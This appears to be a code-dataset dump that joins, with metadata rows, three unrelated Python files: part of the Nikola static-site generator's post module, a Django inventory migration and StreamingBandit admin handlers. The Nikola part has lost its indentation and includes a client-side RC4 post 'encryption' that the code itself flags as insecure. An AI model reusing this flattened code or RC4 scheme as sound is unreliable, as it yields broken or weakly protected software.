If ``lang`` is not specified, this dependency is added for all languages.
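        Example (the path is illustrative):
        post.add_dependency('listings/hello.py', add='page')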
"""
if add not in {'fragment', 'page', 'both'}:
raise Exception("Add parameter is '{0}', but must be either 'fragment', 'page', or 'both'.".format(add))
if add == 'fragment' or add == 'both':
self._dependency_file_fragment[lang].append((type(dependency) != str, dependency))
if add == 'page' or add == 'both':
self._dependency_file_page[lang].append((type(dependency) != str, dependency))
def add_dependency_uptodate(self, dependency, is_callable=False, add='both', lang=None):
"""Add a dependency for task's ``uptodate`` for tasks using that post.
This can be for example an ``utils.config_changed`` object, or a list of
such objects.
The ``is_callable`` parameter specifies whether ``dependency`` is a
callable which generates an entry or a list of entries for the ``uptodate``
list, or whether it is an entry which can directly be added (as a single
object or a list of objects).
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
If ``lang`` is not specified, this dependency is added for all languages.
Example:
post.add_dependency_uptodate(
utils.config_changed({1: some_data}, 'uniqueid'), False, 'page')
"""
if add == 'fragment' or add == 'both':
self._dependency_uptodate_fragment[lang].append((is_callable, dependency))
if add == 'page' or add == 'both':
self._dependency_uptodate_page[lang].append((is_callable, dependency))
def _get_dependencies(self, deps_list):
deps = []
for dep in deps_list:
if dep[0]:
# callable
result = dep[1]()
else:
# can add directly
result = dep[1]
# if result is a list, add its contents
if type(result) == list:
deps.extend(result)
else:
deps.append(result)
return deps
def deps(self, lang):
"""Return a list of file dependencies to build this post's page."""
deps = []
if self.default_lang in self.translated_to:
deps.append(self.base_path)
deps.append(self.source_path)
if os.path.exists(self.metadata_path):
deps.append(self.metadata_path)
if lang != self.default_lang:
cand_1 = get_translation_candidate(self.config, self.source_path, lang)
cand_2 = get_translation_candidate(self.config, self.base_path, lang)
if os.path.exists(cand_1):
deps.extend([cand_1, cand_2])
cand_3 = get_translation_candidate(self.config, self.metadata_path, lang)
if os.path.exists(cand_3):
deps.append(cand_3)
deps += self._get_dependencies(self._dependency_file_page[lang])
deps += self._get_dependencies(self._dependency_file_page[None])
return sorted(deps)
def deps_uptodate(self, lang):
"""Return a list of uptodate dependencies to build this post's page.
These dependencies should be included in ``uptodate`` for the task
which generates the page.
"""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_page[lang])
deps += self._get_dependencies(self._dependency_uptodate_page[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def compile(self, lang):
"""Generate the cache/ file with the compiled post."""
def wrap_encrypt(path, password):
"""Wrap a post with encryption."""
with io.open(path, 'r+', encoding='utf8') as inf:
data = inf.read() + "<!--tail-->"
data = CRYPT.substitute(data=rc4(password, data))
with io.open(path, 'w+', encoding='utf8') as outf:
outf.write(data)
dest = self.translated_base_path(lang)
if not self.is_translation_available(lang) and not self.config['SHOW_UNTRANSLATED_POSTS']:
return
# Set the language to the right thing
LocaleBorg().set_locale(lang)
self.compile_html(
self.translated_source_path(lang),
dest,
self.is_two_file),
if self.meta('password'):
# TODO: get rid of this feature one day (v8?; warning added in v7.3.0.)
LOGGER.warn("The post {0} is using the `password` attribute, which may stop working in the future.")
LOGGER.warn("Please consider switching to a more secure method of encryption.")
LOGGER.warn("More details: https://github.com/getnikola/nikola/issues/1547")
wrap_encrypt(dest, self.meta('password'))
if self.publish_later:
LOGGER.notice('{0} is scheduled to be published in the future ({1})'.format(
self.source_path, self.date))
def fragment_deps(self, lang):
"""Return a list of uptodate dependencies to build this post's fragment.
These dependencies should be included in ``uptodate`` for the task
which generates the fragment.
"""
deps = []
if self.default_lang in self.translated_to:
deps.append(self.source_path)
if os.path.isfile(self.metadata_path):
deps.append(self.metadata_path)
lang_deps = []
if lang != self.default_lang:
lang_deps = [get_translation_candidate(self.config, d, lang) for d in deps]
deps += lang_deps
deps = [d for d in deps if os.path.exists(d)]
deps += self._get_dependencies(self._dependency_file_fragment[lang])
deps += self._get_dependencies(self._dependency_file_fragment[None])
return sorted(deps)
def fragment_deps_uptodate(self, lang):
"""Return a list of file dependencies to build this post's fragment."""
deps = []
deps += self._get_dependencies(self._dependency_uptodate_fragment[lang])
deps += self._get_dependencies(self._dependency_uptodate_fragment[None])
deps.append(utils.config_changed({1: sorted(self.compiler.config_dependencies)}, 'nikola.post.Post.deps_uptodate:compiler:' + self.source_path))
return deps
def is_translation_available(self, lang):
"""Return True if the translation actually exists."""
return lang in self.translated_to
def translated_source_path(self, lang):
"""Return path to the translation's source file."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, lang)
elif lang != self.default_lang:
return self.source_path
else:
return get_translation_candidate(self.config, self.source_path, sorted(self.translated_to)[0])
def translated_base_path(self, lang):
"""Return path to the translation's base_path file."""
return get_translation_candidate(self.config, self.base_path, lang)
def _translated_file_path(self, lang):
"""Return path to the translation's file, or to the original."""
if lang in self.translated_to:
if lang == self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, lang)
elif lang != self.default_lang:
return self.base_path
else:
return get_translation_candidate(self.config, self.base_path, sorted(self.translated_to)[0])
def text(self, lang=None, teaser_only=False, strip_html=False, show_read_more_link=True,
feed_read_more_link=False, feed_links_append_query=None):
"""Read the post file for that language and return its contents.
teaser_only=True breaks at the teaser marker and returns only the teaser.
strip_html=True removes HTML tags
show_read_more_link=False does not add the Read more... link
feed_read_more_link=True uses FEED_READ_MORE_LINK instead of INDEX_READ_MORE_LINK
lang=None uses the last used to set locale
All links in the returned HTML will be relative.
The HTML returned is a bare fragment, not a full document.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
# Yes, we compile it and screw it.
# This may be controversial, but the user (or someone) is asking for the post text
# and the post should not just refuse to give it.
if not os.path.isfile(file_name):
self.compile(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
if self.compiler.extension() == '.php':
return data
try:
document = html5lib.html5parser.parse(data, treebuilder='lxml',
namespaceHTMLElements=False)
document = lxml.html.fragment_fromstring(
lxml.html.tostring(document), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise(e)
base_url = self.permalink(lang=lang)
document.make_links_absolute(base_url)
if self.hyphenate:
hyphenate(document, lang)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except:
data = lxml.html.tostring(document, encoding='unicode')
if teaser_only:
teaser_regexp = self.config.get('TEASER_REGEXP', TEASER_REGEXP)
teaser = teaser_regexp.split(data)[0]
if teaser != data:
if not strip_html and show_read_more_link:
if teaser_regexp.search(data).groups()[-1]:
teaser_text = teaser_regexp.search(data).groups()[-1]
else:
teaser_text = self.messages[lang]["Read more"]
l = self.config['FEED_READ_MORE_LINK'](lang) if feed_read_more_link else self.config['INDEX_READ_MORE_LINK'](lang)
teaser += l.format(
link=self.permalink(lang, query=feed_links_append_query),
read_more=teaser_text,
min_remaining_read=self.messages[lang]["%d min remaining to read"] % (self.remaining_reading_time),
reading_time=self.reading_time,
remaining_reading_time=self.remaining_reading_time,
paragraph_count=self.paragraph_count,
remaining_paragraph_count=self.remaining_paragraph_count)
# This closes all open tags and sanitizes the broken HTML
document = lxml.html.fromstring(teaser)
try:
data = lxml.html.tostring(document.body, encoding='unicode')
except IndexError:
data = lxml.html.tostring(document, encoding='unicode')
if data and strip_html:
try:
# Not all posts have a body. For example, you may have a page statically defined in the template that does not take content as input.
content = lxml.html.fromstring(data)
data = content.text_content().strip() # No whitespace wanted.
except lxml.etree.ParserError:
data = ""
elif data:
if self.demote_headers:
# see above
try:
document = lxml.html.fromstring(data)
demote_headers(document, self.demote_headers)
data = lxml.html.tostring(document.body, encoding='unicode')
except (lxml.etree.ParserError, IndexError):
data = lxml.html.tostring(document, encoding='unicode')
return data
@property
def reading_time(self):
"""Reading time based on length of text."""
if self._reading_time is None:
text = self.text(strip_html=True)
words_per_minute = 220
words = len(text.split())
markup = lxml.html.fromstring(self.text(strip_html=False))
embeddables = [".//img", ".//picture", ".//video", ".//audio", ".//object", ".//iframe"]
media_time = 0
for embedded in embeddables:
media_time += (len(markup.findall(embedded)) * 0.33) # +20 seconds
self._reading_time = int(ceil((words / words_per_minute) + media_time)) or 1
return self._reading_time
@property
def remaining_reading_time(self):
"""Remaining reading time based on length of text (does not include teaser)."""
if self._remaining_reading_time is None:
text = self.text(teaser_only=True, strip_html=True)
words_per_minute = 220
words = len(text.split())
self._remaining_reading_time = self.reading_time - int(ceil(words / words_per_minute)) or 1
return self._remaining_reading_time
@property
def paragraph_count(self):
"""Return the paragraph count for this post."""
if self._paragraph_count is None:
# duplicated with Post.text()
lang = nikola.utils.LocaleBorg().current_lang
file_name = self._translated_file_path(lang)
with io.open(file_name, "r", encoding="utf8") as post_file:
data = post_file.read().strip()
try:
document = html5lib.html5parser.parse(
data, treebuilder='lxml', namespaceHTMLElements=False)
document = lxml.html.fragment_fromstring(
lxml.html.tostring(document), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise(e)
# output is a float, for no real reason at all
self._paragraph_count = int(document.xpath('count(//p)'))
return self._paragraph_count
@property
def remaining_paragraph_count(self):
"""Return the remaining paragraph count for this post (does not include teaser)."""
if self._remaining_paragraph_count is None:
try:
# Just asking self.text() is easier here.
document = html5lib.html5parser.parse(
self.text(teaser_only=True, show_read_more_link=False),
treebuilder='lxml', namespaceHTMLElements=False)
document = lxml.html.fragment_fromstring(
lxml.html.tostring(document), "body")
except lxml.etree.ParserError as e:
# if we don't catch this, it breaks later (Issue #374)
if str(e) == "Document is empty":
return ""
# let other errors raise
raise(e)
self._remaining_paragraph_count = self.paragraph_count - int(document.xpath('count(//p)'))
return self._remaining_paragraph_count
def source_link(self, lang=None):
"""Return absolute link to the post's source."""
ext = self.source_ext(True)
link = "/" + self.destination_path(lang=lang, extension=ext, sep='/')
link = utils.encodelink(link)
return link
def destination_path(self, lang=None, extension='.html', sep=os.sep):
"""Destination path for this post, relative to output/.
If lang is not specified, it's the current language.
Extension is used in the path if specified.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self._has_pretty_url(lang):
path = os.path.join(self.translations[lang],
self.folder, self.meta[lang]['slug'], 'index' + extension)
else:
path = os.path.join(self.translations[lang],
self.folder, self.meta[lang]['slug'] + extension)
if sep != os.sep:
path = path.replace(os.sep, sep)
if path.startswith('./'):
path = path[2:]
return path
def section_color(self, lang=None):
"""Return the color of the post's section."""
slug = self.section_slug(lang)
if slug in self.config['POSTS_SECTION_COLORS'](lang):
return self.config['POSTS_SECTION_COLORS'](lang)[slug]
base = self.config['THEME_COLOR']
return utils.colorize_str_from_base_color(slug, base)
def section_link(self, lang=None):
"""Return the link to the post's section (deprecated)."""
utils.LOGGER.warning("Post.section_link is deprecated. Please use " +
"site.link('section_index', post.section_slug()) instead.")
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
slug = self.section_slug(lang)
t = os.path.normpath(self.translations[lang])
if t == '.':
t = ''
link = '/' + '/'.join(i for i in (t, slug) if i) + '/'
if not self.pretty_urls:
link = urljoin(link, self.index_file)
link = utils.encodelink(link)
return link
def section_name(self, lang=None):
"""Return the name of the post's section."""
slug = self.section_slug(lang)
if slug in self.config['POSTS_SECTION_NAME'](lang):
name = self.config['POSTS_SECTION_NAME'](lang)[slug]
else:
name = slug.replace('-', ' ').title()
return name
def section_slug(self, lang=None):
"""Return the slug for the post's section."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if not self.config['POSTS_SECTION_FROM_META']:
dest = self.destination_path(lang)
if dest[-(1 + len(self.index_file)):] == os.sep + self.index_file:
dest = dest[:-(1 + len(self.index_file))]
dirname = os.path.dirname(dest)
slug = dest.split(os.sep)
if not slug or dirname == '.':
slug = self.messages[lang]["Uncategorized"]
elif lang == slug[0]:
slug = slug[1]
else:
slug = slug[0]
else:
slug = self.meta[lang]['section'].split(',')[0] if 'section' in self.meta[lang] else self.messages[lang]["Uncategorized"]
return utils.slugify(slug)
def permalink(self, lang=None, absolute=False, extension='.html', query=None):
"""Return permalink for a post."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
# Let compilers override extension (e.g. the php compiler)
if self.compiler.extension() != '.html':
extension = self.compiler.extension()
pieces = self.translations[lang].split(os.sep)
pieces += self.folder.split(os.sep)
if self._has_pretty_url(lang):
pieces += [self.meta[lang]['slug'], 'index' + extension]
else:
pieces += [self.meta[lang]['slug'] + extension]
pieces = [_f for _f in pieces if _f and _f != '.']
link = '/' + '/'.join(pieces)
if absolute:
link = urljoin(self.base_url, link[1:])
index_len = len(self.index_file)
if self.strip_indexes and link[-(1 + index_len):] == '/' + self.index_file:
link = link[:-index_len]
if query:
link = link + "?" + query
link = utils.encodelink(link)
return link
@property
def previewimage(self, lang=None):
"""Return the previewimage path."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
image_path = self.meta[lang]['previewimage']
if not image_path:
return None
# This is further parsed by the template, because we don’t have access
# to the URL replacer here. (Issue #1473)
return image_path
def source_ext(self, prefix=False):
"""Return the source file extension.
If `prefix` is True, a `.src.` prefix will be added to the resulting extension
if it's equal to the destination extension.
"""
ext = os.path.splitext(self.source_path)[1]
# do not publish PHP sources
if prefix and ext == '.html':
# ext starts with a dot
return '.src' + ext
else:
return ext
# Code that fetches metadata from different places
def re_meta(line, match=None):
"""Find metadata using regular expressions."""
if match:
reStr = re.compile('^\.\. {0}: (.*)'.format(re.escape(match)))
else:
reStr = re.compile('^\.\. (.*?): (.*)')
result = reStr.findall(line.strip())
if match and result:
return (match, result[0])
elif not match and result:
return (result[0][0], result[0][1].strip())
else:
return (None,)
def _get_metadata_from_filename_by_regex(filename, metadata_regexp, unslugify_titles):
"""Try to reed the metadata from the filename based on the given re.
This requires to use symbolic group names in the pattern.
The part to read the metadata from the filename based on a regular
expression is taken from Pelican - pelican/readers.py
"""
match = re.match(metadata_regexp, filename)
meta = {}
if match:
# .items() for py3k compat.
for key, value in match.groupdict().items():
k = key.lower().strip() # metadata must be lowercase
if k == 'title' and unslugify_titles:
meta[k] = unslugify(value, discard_numbers=False)
else:
meta[k] = value
return meta
def get_metadata_from_file(source_path, config=None, lang=None):
"""Extract metadata from the file itself, by parsing contents."""
try:
if lang and config:
source_path = get_translation_candidate(config, source_path, lang)
elif lang:
source_path += '.' + lang
with io.open(source_path, "r", encoding="utf-8-sig") as meta_file:
meta_data = [x.strip() for x in meta_file.readlines()]
return _get_metadata_from_file(meta_data)
except (UnicodeDecodeError, UnicodeEncodeError):
raise ValueError('Error reading {0}: Nikola only supports UTF-8 files'.format(source_path))
except Exception: # The file may not exist, for multilingual sites
return {}
re_md_title = re.compile(r'^{0}([^{0}].*)'.format(re.escape('#')))
# Assuming rst titles are going to be at least 4 chars long
# otherwise this detects things like ''' which breaks other markups.
re_rst_title = re.compile(r'^([{0}]{{4,}})'.format(re.escape(
string.punctuation)))
def _get_title_from_contents(meta_data):
"""Extract title from file contents, LAST RESOURCE."""
piece = meta_data[:]
title = None
for i, line in enumerate(piece):
if re_rst_title.findall(line) and i > 0:
title = meta_data[i - 1].strip()
break
if (re_rst_title.findall(line) and i >= 0 and
re_rst_title.findall(meta_data[i + 2])):
title = meta_data[i + 1].strip()
break
if re_md_title.findall(line):
title = re_md_title.findall(line)[0]
break
return title
def _get_metadata_from_file(meta_data):
"""Extract metadata from a post's source file."""
meta = {}
if not meta_data:
return meta
# Skip up to one empty line at the beginning (for txt2tags)
if not meta_data[0]:
meta_data = meta_data[1:]
# First, get metadata from the beginning of the file,
# up to first empty line
for i, line in enumerate(meta_data):
if not line:
break
match = re_meta(line)
if match[0]:
meta[match[0]] = match[1]
# If we have no title, try to get it from document
if 'title' not in meta:
t = _get_title_from_contents(meta_data)
if t is not None:
meta['title'] = t
return meta
def get_metadata_from_meta_file(path, config=None, lang=None):
"""Take a post path, and gets data from a matching .meta file."""
global _UPGRADE_METADATA_ADVERTISED
meta_path = os.path.splitext(path)[0] + '.meta'
if lang and config:
meta_path = get_translation_candidate(config, meta_path, lang)
elif lang:
meta_path += '.' + lang
if os.path.isfile(meta_path):
with io.open(meta_path, "r", encoding="utf8") as meta_file:
meta_data = meta_file.readlines()
# Detect new-style metadata.
newstyleregexp = re.compile(r'\.\. .*?: .*')
newstylemeta = False
for l in meta_data:
if l.strip():
if re.match(newstyleregexp, l):
newstylemeta = True
if newstylemeta:
# New-style metadata is basically the same as reading metadata from
# a 1-file post.
return get_metadata_from_file(path, config, lang), newstylemeta
else:
if not _UPGRADE_METADATA_ADVERTISED:
LOGGER.warn("Some posts on your site have old-style metadata. You should upgrade them to the new format, with support for extra fields.")
LOGGER.warn("Install the 'upgrade_metadata' plugin (with 'nikola plugin -i upgrade_metadata') and run 'nikola upgrade_metadata'.")
_UPGRADE_METADATA_ADVERTISED = True
while len(meta_data) < 7:
meta_data.append("")
(title, slug, date, tags, link, description, _type) = [
x.strip() for x in meta_data][:7]
meta = {}
if title:
meta['title'] = title
if slug:
meta['slug'] = slug
if date:
meta['date'] = date
if tags:
meta['tags'] = tags
if link:
meta['link'] = link
if description:
meta['description'] = description
if _type:
meta['type'] = _type
return meta, newstylemeta
elif lang:
# Metadata file doesn't exist, but not default language,
# So, if default language metadata exists, return that.
# This makes the 2-file format detection more reliable (Issue #525)
return get_metadata_from_meta_file(path, config, lang=None)
else:
return {}, True
def get_meta(post, file_metadata_regexp=None, unslugify_titles=False, lang=None):
"""Get post's meta from source.
If ``file_metadata_regexp`` is given it will be tried to read
metadata from the filename.
If ``unslugify_titles`` is True, the extracted title (if any) will be unslugified, as is done in galleries.
If any metadata is then found inside the file the metadata from the
file will override previous findings.
"""
meta = defaultdict(lambda: '')
try:
config = post.config
except AttributeError:
config = None
_, newstylemeta = get_metadata_from_meta_file(post.metadata_path, config, lang)
meta.update(_)
if not meta:
post.is_two_file = False
if file_metadata_regexp is not None:
meta.update(_get_metadata_from_filename_by_regex(post.source_path,
file_metadata_regexp,
unslugify_titles))
compiler_meta = {}
if getattr(post, 'compiler', None):
compiler_meta = post.compiler.read_metadata(post, file_metadata_regexp, unslugify_titles, lang)
meta.update(compiler_meta)
if not post.is_two_file and not compiler_meta:
# Meta file has precedence over file, which can contain garbage.
# Moreover, we should not to talk to the file if we have compiler meta.
meta.update(get_metadata_from_file(post.source_path, config, lang))
if lang is None:
# Only perform these checks for the default language
if 'slug' not in meta:
# If no slug is found in the metadata use the filename
meta['slug'] = slugify(unicode_str(os.path.splitext(
os.path.basename(post.source_path))[0]))
if 'title' not in meta:
# If no title is found, use the filename without extension
meta['title'] = os.path.splitext(
os.path.basename(post.source_path))[0]
return meta, newstylemeta
def hyphenate(dom, _lang):
"""Hyphenate a post."""
# circular import prevention
from .nikola import LEGAL_VALUES
lang = None
if pyphen is not None:
lang = LEGAL_VALUES['PYPHEN_LOCALES'].get(_lang, pyphen.language_fallback(_lang))
else:
utils.req_missing(['pyphen'], 'hyphenate texts', optional=True)
if pyphen is not None and lang is not None:
# If pyphen does exist, we tell the user when configuring the site.
# If it does not support a language, we ignore it quietly.
try:
hyphenator = pyphen.Pyphen(lang=lang)
except KeyError:
LOGGER.error("Cannot find hyphenation dictoniaries for {0} (from {1}).".format(lang, _lang))
LOGGER.error("Pyphen cannot be installed to ~/.local (pip install --user).")
for tag in ('p', 'li', 'span'):
for node in dom.xpath("//%s[not(parent::pre)]" % tag):
skip_node = False
skippable_nodes = ['kbd', 'code', 'samp', 'mark', 'math', 'data', 'ruby', 'svg']
if node.getchildren():
for child in node.getchildren():
if child.tag in skippable_nodes or (child.tag == 'span' and 'math' in child.get('class', [])):
skip_node = True
elif 'math' in node.get('class', []):
skip_node = True
if not skip_node:
insert_hyphens(node, hyphenator)
return dom
def insert_hyphens(node, hyphenator):
"""Insert hyphens into a node."""
textattrs = ('text', 'tail')
if isinstance(node, lxml.etree._Entity):
# HTML entities have no .text
textattrs = ('tail',)
for attr in textattrs:
text = getattr(node, attr)
if not text:
continue
new_data = ' '.join([hyphenator.inserted(w, hyphen='\u00AD')
for w in text.split(' ')])
# Spaces are trimmed, we have to add them manually back
if text[0].isspace():
new_data = ' ' + new_data
if text[-1].isspace():
new_data += ' '
setattr(node, attr, new_data)
for child in node.iterchildren():
insert_hyphens(child, hyphenator)
CRYPT = string.Template("""\
<script>
function rc4(key, str) {
var s = [], j = 0, x, res = '';
for (var i = 0; i < 256; i++) {
s[i] = i;
}
for (i = 0; i < 256; i++) {
j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
}
i = 0;
j = 0;
for (var y = 0; y < str.length; y++) {
i = (i + 1) % 256;
j = (j + s[i]) % 256;
x = s[i];
s[i] = s[j];
s[j] = x;
res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
}
return res;
}
function decrypt() {
key = $$("#key").val();
crypt_div = $$("#encr")
crypted = crypt_div.html();
decrypted = rc4(key, window.atob(crypted));
if (decrypted.substr(decrypted.length - 11) == "<!--tail-->"){
crypt_div.html(decrypted);
$$("#pwform").hide();
crypt_div.show();
} else { alert("Wrong password"); };
}
</script>
<div id="encr" style="display: none;">${data}</div>
<div id="pwform">
<form onsubmit="javascript:decrypt(); return false;" class="form-inline">
<fieldset>
<legend>This post is password-protected.</legend>
<input type="password" id="key" placeholder="Type password here">
<button type="submit" class="btn">Show Content</button>
</fieldset>
</form>
</div>""")
| mit | 5,035,294,736,049,951,000 | 38.76431 | 159 | 0.582409 | false | 4.003729 | true | false | false |
GETLIMS/LIMS-Backend | lims/inventory/migrations/0001_initial.py | 1 | 6145 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import mptt.fields
import gm2m.fields
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='AmountMeasure',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=100)),
('symbol', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=100)),
('identifier', models.CharField(unique=True, blank=True, null=True, db_index=True, max_length=20)),
('description', models.TextField(blank=True, null=True)),
('in_inventory', models.BooleanField(default=False)),
('amount_available', models.IntegerField(default=0)),
('added_on', models.DateTimeField(auto_now_add=True)),
('last_updated_on', models.DateTimeField(auto_now=True)),
('added_by', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
('amount_measure', models.ForeignKey(to='inventory.AmountMeasure')),
('created_from', models.ManyToManyField(to='inventory.Item', blank=True, related_name='created_from_rel_+')),
],
),
migrations.CreateModel(
name='ItemProperty',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=200)),
('value', models.TextField()),
('item', models.ForeignKey(to='inventory.Item', related_name='properties')),
],
),
migrations.CreateModel(
name='ItemTransfer',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('amount_taken', models.IntegerField(default=0)),
('barcode', models.CharField(blank=True, null=True, max_length=20)),
('coordinates', models.CharField(blank=True, null=True, max_length=2)),
('transfer_complete', models.BooleanField(default=False)),
('amount_measure', models.ForeignKey(to='inventory.AmountMeasure')),
('item', models.ForeignKey(to='inventory.Item')),
],
),
migrations.CreateModel(
name='ItemType',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(unique=True, db_index=True, max_length=150)),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('parent', mptt.fields.TreeForeignKey(null=True, related_name='children', to='inventory.ItemType', blank=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Location',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=100)),
('code', models.CharField(unique=True, null=True, max_length=6)),
('lft', models.PositiveIntegerField(editable=False, db_index=True)),
('rght', models.PositiveIntegerField(editable=False, db_index=True)),
('tree_id', models.PositiveIntegerField(editable=False, db_index=True)),
('level', models.PositiveIntegerField(editable=False, db_index=True)),
('parent', mptt.fields.TreeForeignKey(null=True, related_name='children', to='inventory.Location', blank=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Set',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=40)),
('is_public', models.BooleanField(default=False)),
('is_partset', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, verbose_name='ID', primary_key=True)),
('name', models.CharField(max_length=30)),
],
),
migrations.AddField(
model_name='item',
name='item_type',
field=mptt.fields.TreeForeignKey(to='inventory.ItemType'),
),
migrations.AddField(
model_name='item',
name='location',
field=mptt.fields.TreeForeignKey(null=True, to='inventory.Location', blank=True),
),
migrations.AddField(
model_name='item',
name='sets',
field=gm2m.fields.GM2MField('inventory.Set', through_fields=('gm2m_src', 'gm2m_tgt', 'gm2m_ct', 'gm2m_pk'), related_name='items'),
),
migrations.AddField(
model_name='item',
name='tags',
field=models.ManyToManyField(to='inventory.Tag', blank=True),
),
]
| mit | 7,413,653,602,382,370,000 | 46.269231 | 142 | 0.559642 | false | 4.398712 | false | false | false |
MKaptein/streamingbandit | app/handlers/adminhandlers.py | 1 | 19180 | # -*- coding: utf-8 -*-
import tornado.escape
import tornado.ioloop
import tornado.web
import json
import random
import os
from handlers.basehandler import BaseHandler, ExceptionHandler
from core.experiment import Experiment
from db.database import Database
from db.mongolog import MongoLog
from db.users import Users
class GenerateExperiments(BaseHandler):
def get(self):
""" Retrieve a list of experiments running on this server
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:returns: A JSON containing exp_id and name pairs.
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
user = self.get_current_user()
if user:
db = Database()
response = db.get_all_experiments(int(user))
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
def post(self):
""" Create a new experiment
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp |
| {"name" : NAME, "get_context" : CODE, "get_action" : CODE, |
| "get_reward" : CODE, "set_reward" : CODE, "advice_id" : True, |
| "hourly_theta" : True, "delta_hours" : DELTA_HOURS, |
| "default_reward" : DEFAULT_REWARD} |
+--------------------------------------------------------------------+
.. note:: The parameters for the POST calls have to be posted in the \
body as a JSON object.
:requires: A secure cookie obtained by logging in.
:param string name: Name of the experiment.
:param string get_context (optional): String of python code for get context code.
:param string get_action (optional): String of python code for get action code.
:param string get_reward (optional): String of python code for get reward code.
:param string set_reward (optional): String of python code for set reward code.
:param bool hourly_theta: Bool indicating whether the state of Theta should be stored hourly.
        :param bool advice_id: Bool indicating whether the getAdvice and setReward calls should return an advice_id.
:param int delta_hours: If advice_id is True, supply this to give the number of hours that an advice_id should be stored (between 0 and 99999).
:param dict default_reward: If advice_id is True, supply this to give the default reward for advice_id's that are over their delta_hours limit.
:returns: A JSON of the form:
.. code-block:: json
{
"id" : The assigned experiment id,
"name" : The name of the experiment (checked for duplicates),
"error" : (Optional) error message
"key" : The key for the experiment
}
:raises 401: If user is not logged in or if there is no secure cookie available.
"""
user = self.get_current_user()
if user:
data = tornado.escape.json_decode(self.request.body)
exp_obj = {}
exp_obj["user_id"] = int(user)
exp_obj["name"] = data["name"]
if "get_context" in data:
exp_obj["get_context"] = data["get_context"]
else:
exp_obj["get_context"] = ""
if "get_action" in data:
exp_obj["get_action"] = data["get_action"]
else:
exp_obj["get_action"] = ""
if "get_reward" in data:
exp_obj["get_reward"] = data["get_reward"]
else:
exp_obj["get_reward"] = ""
if "set_reward" in data:
exp_obj["set_reward"] = data["set_reward"]
else:
exp_obj["set_reward"] = ""
exp_obj["hourly_theta"] = data["hourly_theta"]
exp_obj["advice_id"] = data["advice_id"]
if exp_obj["advice_id"] in ["true", "True", "y", "yes"]:
exp_obj["advice_id"] = "True"
else:
exp_obj["advice_id"] = "False"
if exp_obj["advice_id"] is "True":
if 0 <= int(data["delta_hours"]) <= 99999:
exp_obj["delta_hours"] = data["delta_hours"]
else:
raise ExceptionHandler(reason = "Supplied number for delta hours must be between 0 and 99999.", status_code = 400)
exp_obj["default_reward"] = data["default_reward"]
exp_obj["key"] = hex(random.getrandbits(42))[2:-1]
db = Database()
insertid = db.insert_experiment(exp_obj)
response = {}
response["name"] = exp_obj["name"]
response["id"] = insertid
response["key"] = exp_obj["key"]
response["error"] = False
self.write(json.dumps(response))
else:
raise ExceptionHandler(reason = "Could not validate user.", status_code = 401)
class UpdateExperiment(BaseHandler):
def get(self, exp_id):
""" Retrieve a specific experiment running on this server
+--------------------------------------------------------------------+
| Example |
+====================================================================+
| http://example.com/exp/EXP_ID |
+--------------------------------------------------------------------+
:requires: A secure cookie obtained by logging in.
:param int exp_id: Experiment ID for the experiment that is to be retrieved.
        :returns: A JSON containing all the info for the experiment.
